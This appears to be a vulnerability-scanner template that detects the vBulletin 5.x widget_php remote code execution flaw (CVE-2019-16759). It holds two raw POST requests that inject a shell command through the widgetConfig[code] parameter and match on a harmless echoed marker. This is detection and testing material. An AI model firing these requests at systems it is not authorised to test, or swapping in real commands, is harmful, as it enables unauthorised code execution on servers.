id: cve-2019-16759

info:
  name: 0day RCE in vBulletin v5.0.0-v5.5.4
  author: dwisiswant0
  severity: high

requests:
  - raw:
      - |
        POST /index.php?routestring=ajax/render/widget_php HTTP/1.1

        widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
      - |
        POST / HTTP/1.1

        {"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "nonexistent:1337"